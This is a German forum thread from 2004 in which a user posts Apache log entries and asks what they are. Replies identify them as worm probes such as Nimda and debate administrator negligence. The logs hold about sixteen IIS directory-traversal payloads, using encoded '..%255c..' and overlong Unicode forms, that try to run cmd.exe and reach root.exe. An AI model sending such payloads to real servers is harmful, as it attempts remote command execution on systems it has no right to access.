Apache Log

Okrill

Mitglied
Thread Starter
Mitglied seit
18.01.2002
Beiträge
67
Beim stöbern in den Apache log's bin ich über solche einträge gestolpert (ist eine eigenes Logfile):
217.235.100.236 - - [06/Dec/2004:13:39:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
217.235.100.236 - - [06/Dec/2004:13:39:39 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
217.235.100.236 - - [06/Dec/2004:13:39:42 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
217.235.100.236 - - [06/Dec/2004:13:39:48 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:39:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
217.235.100.236 - - [06/Dec/2004:13:39:57 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
217.235.100.236 - - [06/Dec/2004:13:40:00 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:06 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
217.235.100.236 - - [06/Dec/2004:13:40:12 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:15 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
217.235.100.236 - - [06/Dec/2004:13:40:18 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.235.100.236 - - [06/Dec/2004:13:40:21 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
und im Access log ist zur passenden zeit das drin:
217.235.100.236 - [06/Dec/2004:13:39:36 +0100] -
So wie ich das interpretiere muss ich mir um unseren OS X Server keine sorgen machen (zumindest noch nicht ;)) aber ich bin neugierig, war das ein versuch ein Win32 anzugreifen? oder was wurde da versucht?
 

ColoredScy

Mitglied
Mitglied seit
15.01.2004
Beiträge
78
was für schwachstellen oder lücken da versucht werden auszunutzen kann ich dir nicht sagen, aber ich lösche diese logfiles bei mir monatlich.

die größte logdatei hatte ich im jan. diesen jahres - da war die datei 21mb gross! wobei 99.9% der einträge der von dir beschriebenen art waren.
 

ovski

Mitglied
Mitglied seit
16.04.2004
Beiträge
150

IceHouse

Mitglied
Mitglied seit
03.06.2002
Beiträge
691
ovski schrieb:
nun... eigentlich sinds doch würmer welche nen "break in" versuchen? z.B. der nimda... soweit ich weiss hats nichts mit usern oder admins zu tun..
Jede Kette (Apachekonfiguration) ist so stark, wie ihr schwaechstes Glied (Admin/ Mensch).

In diesem Fall erzeugt ein unfaehiger Systemadministrator, durch fahrlaessige Unterlassung, NUR Muell in einem Logfile (mit anderem Schaedling, sowie einem eingeschleustem RootKit haette es aber auch schlimmer kommen koennen). Unter Beruecksichtigung der Tatsache, wann dieser Schaedling das Licht der Welt erblickte und immer noch wuetet, ist es um so schlimmer. Da ist jemand nicht nur faehrlaessig sondern total desinteressiert. So jemandem gehoert jeglicher Zugang zu Computern entzogen.

Gruss von IceHouse
 

ovski

Mitglied
Mitglied seit
16.04.2004
Beiträge
150
IceHouse schrieb:
Jede Kette (Apachekonfiguration) ist so stark, wie ihr schwaechstes Glied (Admin/ Mensch).

In diesem Fall erzeugt ein unfaehiger Systemadministrator, durch fahrlaessige Unterlassung, NUR Muell in einem Logfile (mit anderem Schaedling, sowie einem eingeschleustem RootKit haette es aber auch schlimmer kommen koennen). Unter Beruecksichtigung der Tatsache, wann dieser Schaedling das Licht der Welt erblickte und immer noch wuetet, ist es um so schlimmer. Da ist jemand nicht nur faehrlaessig sondern total desinteressiert. So jemandem gehoert jeglicher Zugang zu Computern entzogen.

Gruss von IceHouse
find ich jetzt ein wenig weit hergeholt.
egal.. hab leider keine zeit und keine lust zu phylosophieren.

bye